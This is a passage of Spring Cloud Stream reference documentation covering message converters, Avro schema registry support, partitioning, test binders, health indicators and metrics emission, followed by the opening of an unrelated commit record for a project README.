`MessageConverter`s.\n\nNOTE: It is important to understand that custom `MessageConverter` implementations are added to the head of the existing stack.\nConsequently, custom `MessageConverter` implementations take precedence over the existing ones, which lets you override as well as add to the existing converters.\n\nThe following example shows how to create a message converter bean to support a new content type called `application\/bar`:\n\n[source,java]\n----\n@EnableBinding(Sink.class)\n@SpringBootApplication\npublic static class SinkApplication {\n\n ...\n\n @Bean\n @StreamMessageConverter\n public MessageConverter customMessageConverter() {\n return new MyCustomMessageConverter();\n }\n}\n\npublic class MyCustomMessageConverter extends AbstractMessageConverter {\n\n public MyCustomMessageConverter() {\n super(new MimeType(\"application\", \"bar\"));\n }\n\n @Override\n protected boolean supports(Class<?> clazz) {\n return (Bar.class.equals(clazz));\n }\n\n @Override\n protected Object convertFromInternal(Message<?> message, Class<?> targetClass, Object conversionHint) {\n Object payload = message.getPayload();\n return (payload instanceof Bar ? payload : new Bar((byte[]) payload));\n }\n}\n----\n\nSpring Cloud Stream also provides support for Avro-based converters and schema evolution.\nSee \"`<<schema-evolution>>`\" for details.\n\n[[schema-evolution]]\n== Schema Evolution Support\n\nSpring Cloud Stream provides support for schema evolution so that the data can be evolved over time and still work with older or newer producers and consumers and vice versa.\nMost serialization models, especially the ones that aim for portability across different platforms and languages, rely on a schema that describes how the data is serialized in the binary payload.\nIn order to serialize the data and then to interpret it, both the sending and receiving sides must have access to a schema that describes the binary format.\nIn certain cases, the schema can be inferred from the payload type on serialization or from the target type on deserialization.\nHowever, many applications benefit from having access to an explicit schema that describes the binary data format.\nA schema registry lets you store schema information in a textual format (typically JSON) and makes that information accessible to various applications that need it to receive and send data in binary format.\nA schema is referenceable as a tuple consisting of:\n\n* A subject that is the logical name of the schema\n* The schema version\n* The schema format, which describes the binary format of the data\n\nThis following sections goes through the details of various components involved in schema evolution process.\n\n=== Schema Registry Client\n\nThe client-side abstraction for interacting with schema registry servers is the `SchemaRegistryClient` interface, which has the following structure:\n\n[source,java]\n----\npublic interface SchemaRegistryClient {\n\n SchemaRegistrationResponse register(String subject, String format, String schema);\n\n String fetch(SchemaReference schemaReference);\n\n String fetch(Integer id);\n\n}\n----\n\nSpring Cloud Stream provides out-of-the-box implementations for interacting with its own schema server and for interacting with the Confluent Schema Registry.\n\nA client for the Spring Cloud Stream schema registry can be configured by using the `@EnableSchemaRegistryClient`, as follows:\n\n[source,java]\n----\n @EnableBinding(Sink.class)\n @SpringBootApplication\n @EnableSchemaRegistryClient\n public static class AvroSinkApplication {\n ...\n }\n----\n\nNOTE: The default converter is optimized to cache not only the schemas from the remote server but also the `parse()` and `toString()` methods, which are quite expensive.\nBecause of this, it uses a `DefaultSchemaRegistryClient` that does not cache responses.\nIf you intend to change the default behavior, you can use the client directly on your code and override it to the desired outcome.\nTo do so, you have to add the property `spring.cloud.stream.schemaRegistryClient.cached=true` to your application properties.\n\n==== Schema Registry Client Properties\n\nThe Schema Registry Client supports the following properties:\n\n`spring.cloud.stream.schemaRegistryClient.endpoint`:: The location of the schema-server.\nWhen setting this, use a full URL, including protocol (`http` or `https`) , port, and context path.\n+\nDefault:: `http:\/\/localhost:8990\/`\n`spring.cloud.stream.schemaRegistryClient.cached`:: Whether the client should cache schema server responses.\nNormally set to `false`, as the caching happens in the message converter.\nClients using the schema registry client should set this to `true`.\n+\nDefault:: `false`\n\n=== Avro Schema Registry Client Message Converters\n\nFor applications that have a SchemaRegistryClient bean registered with the application context, Spring Cloud Stream auto configures an Apache Avro message converter for schema management.\nThis eases schema evolution, as applications that receive messages can get easy access to a writer schema that can be reconciled with their own reader schema.\n\nFor outbound messages, if the content type of the channel is set to `application\/*+avro`, the `MessageConverter` is activated, as shown in the following example:\n\n[source,properties]\n----\nspring.cloud.stream.bindings.output.contentType=application\/*+avro\n----\n\nDuring the outbound conversion, the message converter tries to infer the schema of each outbound messages (based on its type) and register it to a subject (based on the payload type) by using the `SchemaRegistryClient`.\nIf an identical schema is already found, then a reference to it is retrieved.\nIf not, the schema is registered, and a new version number is provided.\nThe message is sent with a `contentType` header by using the following scheme: `application\/[prefix].[subject].v[version]+avro`, where `prefix` is configurable and `subject` is deduced from the payload type.\n\nFor example, a message of the type `User` might be sent as a binary payload with a content type of `application\/vnd.user.v2+avro`, where `user` is the subject and `2` is the version number.\n\nWhen receiving messages, the converter infers the schema reference from the header of the incoming message and tries to retrieve it. The schema is used as the writer schema in the deserialization process.\n\n==== Avro Schema Registry Message Converter Properties\n\nIf you have enabled Avro based schema registry client by setting `spring.cloud.stream.bindings.output.contentType=application\/*+avro`, you can customize the behavior of the registration by setting the following properties.\n\nspring.cloud.stream.schema.avro.dynamicSchemaGenerationEnabled:: Enable if you want the converter to use reflection to infer a Schema from a POJO.\n+\nDefault: `false`\n+\nspring.cloud.stream.schema.avro.readerSchema:: Avro compares schema versions by looking at a writer schema (origin payload) and a reader schema (your application payload). See the https:\/\/avro.apache.org\/docs\/1.7.6\/spec.html[Avro documentation] for more information. If set, this overrides any lookups at the schema server and uses the local schema as the reader schema.\nDefault: `null`\n+\nspring.cloud.stream.schema.avro.schemaLocations:: Registers any `.avsc` files listed in this property with the Schema Server.\n+\nDefault: `empty`\n+\nspring.cloud.stream.schema.avro.prefix:: The prefix to be used on the Content-Type header.\n+\nDefault: `vnd`\n\n=== Apache Avro Message Converters\n\nSpring Cloud Stream provides support for schema-based message converters through its `spring-cloud-stream-schema` module.\nCurrently, the only serialization format supported out of the box for schema-based message converters is Apache Avro, with more formats to be added in future versions.\n\nThe `spring-cloud-stream-schema` module contains two types of message converters that can be used for Apache Avro serialization:\n\n* Converters that use the class information of the serialized or deserialized objects or a schema with a location known at startup.\n* Converters that use a schema registry. They locate the schemas at runtime and dynamically register new schemas as domain objects evolve.\n\n=== Converters with Schema Support\n\nThe `AvroSchemaMessageConverter` supports serializing and deserializing messages either by using a predefined schema or by using the schema information available in the class (either reflectively or contained in the `SpecificRecord`).\nIf you provide a custom converter, then the default AvroSchemaMessageConverter bean is not created. The following example shows a custom converter:\n\nTo use custom converters, you can simply add it to the application context, optionally specifying one or more `MimeTypes` with which to associate it.\nThe default `MimeType` is `application\/avro`.\n\nIf the target type of the conversion is a `GenericRecord`, a schema must be set.\n\nThe following example shows how to configure a converter in a sink application by registering the Apache Avro `MessageConverter` without a predefined schema.\nIn this example, note that the mime type value is `avro\/bytes`, not the default `application\/avro`.\n\n[source,java]\n----\n@EnableBinding(Sink.class)\n@SpringBootApplication\npublic static class SinkApplication {\n\n ...\n\n @Bean\n public MessageConverter userMessageConverter() {\n return new AvroSchemaMessageConverter(MimeType.valueOf(\"avro\/bytes\"));\n }\n}\n----\n\nConversely, the following application registers a converter with a predefined schema (found on the classpath):\n\n[source,java]\n----\n@EnableBinding(Sink.class)\n@SpringBootApplication\npublic static class SinkApplication {\n\n ...\n\n @Bean\n public MessageConverter userMessageConverter() {\n AvroSchemaMessageConverter converter = new AvroSchemaMessageConverter(MimeType.valueOf(\"avro\/bytes\"));\n converter.setSchemaLocation(new ClassPathResource(\"schemas\/User.avro\"));\n return converter;\n }\n}\n----\n\n=== Schema Registry Server\n\nSpring Cloud Stream provides a schema registry server implementation.\nTo use it, you can add the `spring-cloud-stream-schema-server` artifact to your project and use the `@EnableSchemaRegistryServer` annotation, which adds the schema registry server REST controller to your application.\nThis annotation is intended to be used with Spring Boot web applications, and the listening port of the server is controlled by the `server.port` property.\nThe `spring.cloud.stream.schema.server.path` property can be used to control the root path of the schema server (especially when it is embedded in other applications).\nThe `spring.cloud.stream.schema.server.allowSchemaDeletion` boolean property enables the deletion of a schema. By default, this is disabled.\n\nThe schema registry server uses a relational database to store the schemas.\nBy default, it uses an embedded database.\nYou can customize the schema storage by using the http:\/\/docs.spring.io\/spring-boot\/docs\/current-SNAPSHOT\/reference\/htmlsingle\/#boot-features-sql[Spring Boot SQL database and JDBC configuration options].\n\nThe following example shows a Spring Boot application that enables the schema registry:\n\n[source,java]\n----\n@SpringBootApplication\n@EnableSchemaRegistryServer\npublic class SchemaRegistryServerApplication {\n public static void main(String[] args) {\n SpringApplication.run(SchemaRegistryServerApplication.class, args);\n }\n}\n----\n\n==== Schema Registry Server API\n\nThe Schema Registry Server API consists of the following operations:\n\n* `POST \/` -- see \"`<<spring-cloud-stream-overview-registering-new-schema>>`\"\n* 'GET \/{subject}\/{format}\/{version}' -- see \"`<<spring-cloud-stream-overview-retrieve-schema-subject-format-version>>`\"\n* `GET \/{subject}\/{format}` -- see \"`<<spring-cloud-stream-overview-retrieve-schema-subject-format>>`\"\n* `GET \/schemas\/{id}` -- see \"`<<spring-cloud-stream-overview-retrieve-schema-id>>`\"\n* `DELETE \/{subject}\/{format}\/{version}` -- see \"`<<spring-cloud-stream-overview-deleting-schema-subject-format-version>>`\"\n* `DELETE \/schemas\/{id}` -- see \"`<<spring-cloud-stream-overview-deleting-schema-id>>`\"\n* `DELETE \/{subject}` -- see \"`<<spring-cloud-stream-overview-deleting-schema-subject>>`\"\n\n[[spring-cloud-stream-overview-registering-new-schema]]\n===== Registering a New Schema\n\nTo register a new schema, send a `POST` request to the `\/` endpoint.\n\nThe `\/` accepts a JSON payload with the following fields:\n\n* `subject`: The schema subject\n* `format`: The schema format\n* `definition`: The schema definition\n\nIts response is a schema object in JSON, with the following fields:\n\n* `id`: The schema ID\n* `subject`: The schema subject\n* `format`: The schema format\n* `version`: The schema version\n* `definition`: The schema definition\n\n[[spring-cloud-stream-overview-retrieve-schema-subject-format-version]]\n===== Retrieving an Existing Schema by Subject, Format, and Version\n\nTo retrieve an existing schema by subject, format, and version, send `GET` request to the `\/{subject}\/{format}\/{version}` endpoint.\n\nIts response is a schema object in JSON, with the following fields:\n\n* `id`: The schema ID\n* `subject`: The schema subject\n* `format`: The schema format\n* `version`: The schema version\n* `definition`: The schema definition\n\n[[spring-cloud-stream-overview-retrieve-schema-subject-format]]\n===== Retrieving an Existing Schema by Subject and Format\n\nTo retrieve an existing schema by subject and format, send a `GET` request to the `\/subject\/format` endpoint.\n\nIts response is a list of schemas with each schema object in JSON, with the following fields:\n\n* `id`: The schema ID\n* `subject`: The schema subject\n* `format`: The schema format\n* `version`: The schema version\n* `definition`: The schema definition\n\n[[spring-cloud-stream-overview-retrieve-schema-id]]\n===== Retrieving an Existing Schema by ID\n\nTo retrieve a schema by its ID, send a `GET` request to the `\/schemas\/{id}` endpoint.\n\nIts response is a schema object in JSON, with the following fields:\n\n* `id`: The schema ID\n* `subject`: The schema subject\n* `format`: The schema format\n* `version`: The schema version\n* `definition`: The schema definition\n\n[[spring-cloud-stream-overview-deleting-schema-subject-format-version]]\n===== Deleting a Schema by Subject, Format, and Version\n\nTo delete a schema identified by its subject, format, and version, send a `DELETE` request to the `\/{subject}\/{format}\/{version}` endpoint.\n\n[[spring-cloud-stream-overview-deleting-schema-id]]\n===== Deleting a Schema by ID\n\nTo delete a schema by its ID, send a `DELETE` request to the `\/schemas\/{id}` endpoint.\n\n[[spring-cloud-stream-overview-deleting-schema-subject]]\n===== Deleting a Schema by Subject\n`DELETE \/{subject}`\n\nDelete existing schemas by their subject.\n\nNOTE: This note applies to users of Spring Cloud Stream 1.1.0.RELEASE only.\nSpring Cloud Stream 1.1.0.RELEASE used the table name, `schema`, for storing `Schema` objects. `Schema` is a keyword in a number of database implementations.\nTo avoid any conflicts in the future, starting with 1.1.1.RELEASE, we have opted for the name `SCHEMA_REPOSITORY` for the storage table.\nAny Spring Cloud Stream 1.1.0.RELEASE users who upgrade should migrate their existing schemas to the new table before upgrading.\n\n==== Using Confluent's Schema Registry\n\nThe default configuration creates a `DefaultSchemaRegistryClient` bean.\nIf you want to use the Confluent schema registry, you need to create a bean of type `ConfluentSchemaRegistryClient`, which supersedes the one configured by default by the framework. The following example shows how to create such a bean:\n\n[source,java]\n----\n@Bean\npublic SchemaRegistryClient schemaRegistryClient(@Value(\"${spring.cloud.stream.schemaRegistryClient.endpoint}\") String endpoint){\n ConfluentSchemaRegistryClient client = new ConfluentSchemaRegistryClient();\n client.setEndpoint(endpoint);\n return client;\n}\n----\nNOTE: The ConfluentSchemaRegistryClient is tested against Confluent platform version 4.0.0.\n\n=== Schema Registration and Resolution\n\nTo better understand how Spring Cloud Stream registers and resolves new schemas and its use of Avro schema comparison features, we provide two separate subsections:\n\n* \"`<<spring-cloud-stream-overview-schema-registration-process>>`\"\n* \"`<<spring-cloud-stream-overview-schema-resolution-process>>`\"\n\n[[spring-cloud-stream-overview-schema-registration-process]]\n==== Schema Registration Process (Serialization)\n\nThe first part of the registration process is extracting a schema from the payload that is being sent over a channel.\nAvro types such as `SpecificRecord` or `GenericRecord` already contain a schema, which can be retrieved immediately from the instance.\nIn the case of POJOs, a schema is inferred if the `spring.cloud.stream.schema.avro.dynamicSchemaGenerationEnabled` property is set to `true` (the default).\n\n.Schema Writer Resolution Process\nimage::schema_resolution.png[width=800,scaledwidth=\"75%\",align=\"center\"]\n\nOnes a schema is obtained, the converter loads its metadata (version) from the remote server.\nFirst, it queries a local cache. If no result is found, it submits the data to the server, which replies with versioning information.\nThe converter always caches the results to avoid the overhead of querying the Schema Server for every new message that needs to be serialized.\n\n.Schema Registration Process\nimage::registration.png[width=800,scaledwidth=\"75%\",align=\"center\"]\n\nWith the schema version information, the converter sets the `contentType` header of the message to carry the version information -- for example: `application\/vnd.user.v1+avro`.\n\n[[spring-cloud-stream-overview-schema-resolution-process]]\n==== Schema Resolution Process (Deserialization)\n\nWhen reading messages that contain version information (that is, a `contentType` header with a scheme like the one described under \"`<<spring-cloud-stream-overview-schema-registration-process>>`\"), the converter queries the Schema server to fetch the writer schema of the message.\nOnce it has found the correct schema of the incoming message, it retrieves the reader schema and, by using Avro's schema resolution support, reads it into the reader definition (setting defaults and any missing properties).\n\n.Schema Reading Resolution Process\nimage::schema_reading.png[width=800,scaledwidth=\"75%\",align=\"center\"]\n\nNOTE: You should understand the difference between a writer schema (the application that wrote the message) and a reader schema (the receiving application).\nWe suggest taking a moment to read https:\/\/avro.apache.org\/docs\/1.7.6\/spec.html[the Avro terminology] and understand the process.\nSpring Cloud Stream always fetches the writer schema to determine how to read a message.\nIf you want to get Avro's schema evolution support working, you need to make sure that a `readerSchema` was properly set for your application.\n\n== Inter-Application Communication\n\nSpring Cloud Stream enables communication between applications. Inter-application communication is a complex issue spanning several concerns, as described in the following topics:\n\n* \"`<<spring-cloud-stream-overview-connecting-multiple-application-instances>>`\"\n* \"`<<spring-cloud-stream-overview-instance-index-instance-count>>`\"\n* \"`<<spring-cloud-stream-overview-partitioning>>`\"\n\n[[spring-cloud-stream-overview-connecting-multiple-application-instances]]\n=== Connecting Multiple Application Instances\n\nWhile Spring Cloud Stream makes it easy for individual Spring Boot applications to connect to messaging systems, the typical scenario for Spring Cloud Stream is the creation of multi-application pipelines, where microservice applications send data to each other.\nYou can achieve this scenario by correlating the input and output destinations of \"`adjacent`\" applications.\n\nSuppose a design calls for the Time Source application to send data to the Log Sink application. You could use a common destination named `ticktock` for bindings within both applications.\n\nTime Source (that has the channel name `output`) would set the following property:\n\n----\nspring.cloud.stream.bindings.output.destination=ticktock\n----\n\nLog Sink (that has the channel name `input`) would set the following property:\n\n----\nspring.cloud.stream.bindings.input.destination=ticktock\n----\n\n[[spring-cloud-stream-overview-instance-index-instance-count]]\n=== Instance Index and Instance Count\n\nWhen scaling up Spring Cloud Stream applications, each instance can receive information about how many other instances of the same application exist and what its own instance index is.\nSpring Cloud Stream does this through the `spring.cloud.stream.instanceCount` and `spring.cloud.stream.instanceIndex` properties.\nFor example, if there are three instances of a HDFS sink application, all three instances have `spring.cloud.stream.instanceCount` set to `3`, and the individual applications have `spring.cloud.stream.instanceIndex` set to `0`, `1`, and `2`, respectively.\n\nWhen Spring Cloud Stream applications are deployed through Spring Cloud Data Flow, these properties are configured automatically; when Spring Cloud Stream applications are launched independently, these properties must be set correctly.\nBy default, `spring.cloud.stream.instanceCount` is `1`, and `spring.cloud.stream.instanceIndex` is `0`.\n\nIn a scaled-up scenario, correct configuration of these two properties is important for addressing partitioning behavior (see below) in general, and the two properties are always required by certain binders (for example, the Kafka binder) in order to ensure that data are split correctly across multiple consumer instances.\n\n[[spring-cloud-stream-overview-partitioning]]\n=== Partitioning\n\nPartitioning in Spring Cloud Stream consists of two tasks:\n\n* \"`<<spring-cloud-stream-overview-configuring-output-bindings-partitioning>>`\"\n* \"`<<spring-cloud-stream-overview-configuring-input-bindings-partitioning>>`\"\n\n[[spring-cloud-stream-overview-configuring-output-bindings-partitioning]]\n==== Configuring Output Bindings for Partitioning\n\nYou can configure an output binding to send partitioned data by setting one and only one of its `partitionKeyExpression` or `partitionKeyExtractorName` properties, as well as its `partitionCount` property.\n\nFor example, the following is a valid and typical configuration:\n\n----\nspring.cloud.stream.bindings.output.producer.partitionKeyExpression=payload.id\nspring.cloud.stream.bindings.output.producer.partitionCount=5\n----\n\nBased on that example configuration, data is sent to the target partition by using the following logic.\n\nA partition key's value is calculated for each message sent to a partitioned output channel based on the `partitionKeyExpression`.\nThe `partitionKeyExpression` is a SpEL expression that is evaluated against the outbound message for extracting the partitioning key.\n\nIf a SpEL expression is not sufficient for your needs, you can instead calculate the partition key value by providing an implementation of `org.springframework.cloud.stream.binder.PartitionKeyExtractorStrategy` and configuring it as a bean (by using the `@Bean` annotation).\nIf you have more then one bean of type `org.springframework.cloud.stream.binder.PartitionKeyExtractorStrategy` available in the Application Context, you can further filter it by specifying its name with the `partitionKeyExtractorName` property, as shown in the following example:\n\n[source]\n----\n--spring.cloud.stream.bindings.output.producer.partitionKeyExtractorName=customPartitionKeyExtractor\n--spring.cloud.stream.bindings.output.producer.partitionCount=5\n. . .\n@Bean\npublic CustomPartitionKeyExtractorClass customPartitionKeyExtractor() {\n return new CustomPartitionKeyExtractorClass();\n}\n----\n\nNOTE: In previous versions of Spring Cloud Stream, you could specify the implementation of `org.springframework.cloud.stream.binder.PartitionKeyExtractorStrategy` by setting the `spring.cloud.stream.bindings.output.producer.partitionKeyExtractorClass` property.\nSince version 2.0, this property is deprecated, and support for it will be removed in a future version.\n\nOnce the message key is calculated, the partition selection process determines the target partition as a value between `0` and `partitionCount - 1`.\nThe default calculation, applicable in most scenarios, is based on the following formula: `key.hashCode() % partitionCount`.\nThis can be customized on the binding, either by setting a SpEL expression to be evaluated against the 'key' (through the `partitionSelectorExpression` property) or by configuring an implementation of `org.springframework.cloud.stream.binder.PartitionSelectorStrategy` as a bean (by using the @Bean annotation).\nSimilar to the `PartitionKeyExtractorStrategy`, you can further filter it by using the `spring.cloud.stream.bindings.output.producer.partitionSelectorName` property when more than one bean of this type is available in the Application Context, as shown in the following example:\n\n[source]\n----\n--spring.cloud.stream.bindings.output.producer.partitionSelectorName=customPartitionSelector\n. . .\n@Bean\npublic CustomPartitionSelectorClass customPartitionSelector() {\n return new CustomPartitionSelectorClass();\n}\n----\n\nNOTE: In previous versions of Spring Cloud Stream you could specify the implementation of `org.springframework.cloud.stream.binder.PartitionSelectorStrategy` by setting the `spring.cloud.stream.bindings.output.producer.partitionSelectorClass` property.\nSince version 2.0, this property is deprecated and support for it will be removed in a future version.\n\n[[spring-cloud-stream-overview-configuring-input-bindings-partitioning]]\n==== Configuring Input Bindings for Partitioning\n\nAn input binding (with the channel name `input`) is configured to receive partitioned data by setting its `partitioned` property, as well as the `instanceIndex` and `instanceCount` properties on the application itself, as shown in the following example:\n\n----\nspring.cloud.stream.bindings.input.consumer.partitioned=true\nspring.cloud.stream.instanceIndex=3\nspring.cloud.stream.instanceCount=5\n----\n\nThe `instanceCount` value represents the total number of application instances between which the data should be partitioned.\nThe `instanceIndex` must be a unique value across the multiple instances, with a value between `0` and `instanceCount - 1`.\nThe instance index helps each application instance to identify the unique partition(s) from which it receives data.\nIt is required by binders using technology that does not support partitioning natively.\nFor example, with RabbitMQ, there is a queue for each partition, with the queue name containing the instance index.\nWith Kafka, if `autoRebalanceEnabled` is `true` (default), Kafka takes care of distributing partitions across instances, and these properties are not required.\nIf `autoRebalanceEnabled` is set to false, the `instanceCount` and `instanceIndex` are used by the binder to determine which partition(s) the instance subscribes to (you must have at least as many partitions as there are instances).\nThe binder allocates the partitions instead of Kafka.\nThis might be useful if you want messages for a particular partition to always go to the same instance.\nWhen a binder configuration requires them, it is important to set both values correctly in order to ensure that all of the data is consumed and that the application instances receive mutually exclusive datasets.\n\nWhile a scenario in which using multiple instances for partitioned data processing may be complex to set up in a standalone case, Spring Cloud Dataflow can simplify the process significantly by populating both the input and output values correctly and by letting you rely on the runtime infrastructure to provide information about the instance index and instance count.\n\n== Testing\n\nSpring Cloud Stream provides support for testing your microservice applications without connecting to a messaging system.\nYou can do that by using the `TestSupportBinder` provided by the `spring-cloud-stream-test-support` library, which can be added as a test dependency to the application, as shown in the following example:\n\n[source,xml]\n----\n <dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-stream-test-support<\/artifactId>\n <scope>test<\/scope>\n <\/dependency>\n----\n\nNOTE: The `TestSupportBinder` uses the Spring Boot autoconfiguration mechanism to supersede the other binders found on the classpath.\nTherefore, when adding a binder as a dependency, you must make sure that the `test` scope is being used.\n\nThe `TestSupportBinder` lets you interact with the bound channels and inspect any messages sent and received by the application.\n\nFor outbound message channels, the `TestSupportBinder` registers a single subscriber and retains the messages emitted by the application in a `MessageCollector`.\nThey can be retrieved during tests and have assertions made against them.\n\nYou can also send messages to inbound message channels so that the consumer application can consume the messages.\nThe following example shows how to test both input and output channels on a processor:\n\n[source,java]\n----\n@RunWith(SpringRunner.class)\n@SpringBootTest(webEnvironment= SpringBootTest.WebEnvironment.RANDOM_PORT)\npublic class ExampleTest {\n\n @Autowired\n private Processor processor;\n\n @Autowired\n private MessageCollector messageCollector;\n\n @Test\n @SuppressWarnings(\"unchecked\")\n public void testWiring() {\n Message<String> message = new GenericMessage<>(\"hello\");\n processor.input().send(message);\n Message<String> received = (Message<String>) messageCollector.forChannel(processor.output()).poll();\n assertThat(received.getPayload(), equalTo(\"hello world\"));\n }\n\n\n @SpringBootApplication\n @EnableBinding(Processor.class)\n public static class MyProcessor {\n\n @Autowired\n private Processor channels;\n\n @Transformer(inputChannel = Processor.INPUT, outputChannel = Processor.OUTPUT)\n public String transform(String in) {\n return in + \" world\";\n }\n }\n}\n----\n\nIn the preceding example, we create an application that has an input channel and an output channel, both bound through the `Processor` interface.\nThe bound interface is injected into the test so that we can have access to both channels.\nWe send a message on the input channel, and we use the `MessageCollector` provided by Spring Cloud Stream's test support to capture that the message has been sent to the output channel as a result.\nOnce we have received the message, we can validate that the component functions correctly.\n\n=== Disabling the Test Binder Autoconfiguration\n\nThe intent behind the test binder superseding all the other binders on the classpath is to make it easy to test your applications without making changes to your production dependencies.\nIn some cases (for example, integration tests) it is useful to use the actual production binders instead, and that requires disabling the test binder autoconfiguration.\nTo do so, you can exclude the `org.springframework.cloud.stream.test.binder.TestSupportBinderAutoConfiguration` class by using one of the Spring Boot autoconfiguration exclusion mechanisms, as shown in the following example:\n\n[source,java]\n----\n @SpringBootApplication(exclude = TestSupportBinderAutoConfiguration.class)\n @EnableBinding(Processor.class)\n public static class MyProcessor {\n\n @Transformer(inputChannel = Processor.INPUT, outputChannel = Processor.OUTPUT)\n public String transform(String in) {\n return in + \" world\";\n }\n }\n----\n\nWhen autoconfiguration is disabled, the test binder is available on the classpath, and its `defaultCandidate` property is set to `false` so that it does not interfere with the regular user configuration. It can be referenced under the name, `test`, as shown in the following example:\n\n`spring.cloud.stream.defaultBinder=test`\n\n== Health Indicator\n\nSpring Cloud Stream provides a health indicator for binders.\nIt is registered under the name `binders` and can be enabled or disabled by setting the `management.health.binders.enabled` property.\n\nTo enable health check you first need to enable both \"web\" and \"actuator\" by including its dependencies (see <<spring-cloud-stream-preface-actuator-web-dependencies>>)\n\nIf `management.health.binders.enabled` is not set explicitly by the application, then `management.health.defaults.enabled` is matched as `true` and the binder health indicators are enabled.\nIf you want to disable health indicator completely, then you have to set `management.health.binders.enabled` to `false`.\n\nYou can use Spring Boot actuator health endpoint to access the health indicator - `\/actuator\/health`.\nBy default, you will only receive the top level application status when you hit the above endpoint.\nIn order to receive the full details from the binder specific health indicators, you need to include the property `management.endpoint.health.show-details` with the value `ALWAYS` in your application.\n\nHealth indicators are binder-specific and certain binder implementations may not necessarily provide a health indicator.\n\nIf you want to completely disable all health indicators available out of the box and instead provide your own health indicators,\nyou can do so by setting property `management.health.binders.enabled` to `false` and then provide your own `HealthIndicator` beans in your application.\nIn this case, the health indicator infrastructure from Spring Boot will still pick up these custom beans.\nEven if you are not disabling the binder health indicators, you can still enhance the health checks by providing your own `HealthIndicator` beans in addition to the out of the box health checks.\n\nWhen you have multiple binders in the same application, health indicators are enabled by default unless the application turns them off by setting `management.health.binders.enabled` to `false`.\nIn this case, if the user wants to disable health check for a subset of the binders, then that should be done by setting `management.health.binders.enabled` to `false` in the multi binder configurations's environment.\nSee <<multiple-systems,Connecting to Multiple Systems>> for details on how environment specific properties can be provided.\n\n\n[[spring-cloud-stream-overview-metrics-emitter]]\n== Metrics Emitter\n\nSpring Boot Actuator provides dependency management and auto-configuration for https:\/\/micrometer.io\/[Micrometer], an application metrics\nfacade that supports numerous https:\/\/docs.spring.io\/spring-boot\/docs\/2.0.0.RELEASE\/reference\/htmlsingle\/#production-ready-metrics[monitoring systems].\n\nSpring Cloud Stream provides support for emitting any available micrometer-based metrics to a binding destination, allowing for periodic\ncollection of metric data from stream applications without relying on polling individual endpoints.\n\nMetrics Emitter is activated by defining the `spring.cloud.stream.bindings.applicationMetrics.destination` property,\nwhich specifies the name of the binding destination used by the current binder to publish metric messages.\n\nFor example:\n[source,java]\n----\nspring.cloud.stream.bindings.applicationMetrics.destination=myMetricDestination\n----\nThe preceding example instructs the binder to bind to `myMetricDestination` (that is, Rabbit exchange, Kafka topic, and others).\n\nThe following properties can be used for customizing the emission of metrics:\n\nspring.cloud.stream.metrics.key::\nThe name of the metric being emitted. Should be a unique value per application.\n+\nDefault: `${spring.application.name:${vcap.application.name:${spring.config.name:application}}}`\n+\nspring.cloud.stream.metrics.properties::\nAllows white listing application properties that are added to the metrics payload\n+\nDefault: null.\n+\nspring.cloud.stream.metrics.meter-filter::\nPattern to control the 'meters' one wants to capture.\nFor example, specifying `spring.integration.*` captures metric information for meters whose name starts with `spring.integration.`\n+\nDefault: all 'meters' are captured.\n+\nspring.cloud.stream.metrics.schedule-interval::\nInterval to control the rate of publishing metric data.\n+\nDefault: 1 min\n\nConsider the following:\n\n[source,bash]\n----\njava -jar time-source.jar \\\n --spring.cloud.stream.bindings.applicationMetrics.destination=someMetrics \\\n --spring.cloud.stream.metrics.properties=spring.application** \\\n --spring.cloud.stream.metrics.meter-filter=spring.integration.*\n----\n\nThe following example shows the payload of the data published to the binding destination as a result of the preceding command:\n\n[source,javascript]\n----\n{\n\t\"name\": \"application\",\n\t\"createdTime\": \"2018-03-23T14:48:12.700Z\",\n\t\"properties\": {\n\t},\n\t\"metrics\": [\n\t\t{\n\t\t\t\"id\": {\n\t\t\t\t\"name\": \"spring.integration.send\",\n\t\t\t\t\"tags\": [\n\t\t\t\t\t{\n\t\t\t\t\t\t\"key\": \"exception\",\n\t\t\t\t\t\t\"value\": \"none\"\n\t\t\t\t\t},\n\t\t\t\t\t{\n\t\t\t\t\t\t\"key\": \"name\",\n\t\t\t\t\t\t\"value\": \"input\"\n\t\t\t\t\t},\n\t\t\t\t\t{\n\t\t\t\t\t\t\"key\": \"result\",\n\t\t\t\t\t\t\"value\": \"success\"\n\t\t\t\t\t},\n\t\t\t\t\t{\n\t\t\t\t\t\t\"key\": \"type\",\n\t\t\t\t\t\t\"value\": \"channel\"\n\t\t\t\t\t}\n\t\t\t\t],\n\t\t\t\t\"type\": \"TIMER\",\n\t\t\t\t\"description\": \"Send processing time\",\n\t\t\t\t\"baseUnit\": \"milliseconds\"\n\t\t\t},\n\t\t\t\"timestamp\": \"2018-03-23T14:48:12.697Z\",\n\t\t\t\"sum\": 130.340546,\n\t\t\t\"count\": 6,\n\t\t\t\"mean\": 21.72342433333333,\n\t\t\t\"upper\": 116.176299,\n\t\t\t\"total\": 130.340546\n\t\t}\n\t]\n}\n----\n\nNOTE: Given that the format of the Metric message has slightly changed after migrating to Micrometer, the published message will also have\na `STREAM_CLOUD_STREAM_VERSION` header set to `2.x` to help distinguish between Metric messages from the older versions of the Spring Cloud Stream.\n\n== Samples\n\nFor Spring Cloud Stream samples, see the https:\/\/github.com\/spring-cloud\/spring-cloud-stream-samples[spring-cloud-stream-samples] repository on GitHub.\n\n=== Deploying Stream Applications on CloudFoundry\n\nOn CloudFoundry, services are usually exposed through a special environment variable called https:\/\/docs.cloudfoundry.org\/devguide\/deploy-apps\/environment-variable.html#VCAP-SERVICES[VCAP_SERVICES].\n\nWhen configuring your binder connections, you can use the values from an environment variable as explained on the http:\/\/docs.spring.io\/spring-cloud-dataflow-server-cloudfoundry\/docs\/current-SNAPSHOT\/reference\/htmlsingle\/#getting-started-ups[dataflow Cloud Foundry Server] docs.","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b1ab6a8fb19e01606802d8b786fe8c7eba9ce316","subject":"doc: fixed typo in readme","message":"doc: fixed typo in readme\n","repos":"toedter\/microservice-60min,toedter\/microservice-60min,toedter\/microservice-60min,toedter\/microservice-60min,toedter\/microservice-60min","old_file":"README.adoc","new_file":"README.adoc","new_contents":"image:https:\/\/travis-ci.org\/toedter\/microservice-60min.svg?branch=master[Build Status, link=\"https:\/\/travis-ci.org\/toedter\/microservice-60min\"]\nimage:http:\/\/img.shields.io\/badge\/license-MIT-blue.svg[\"MIT\", link=\"http:\/\/toedter.mit-license.org\"]\n\n\n= A Microservice in 60 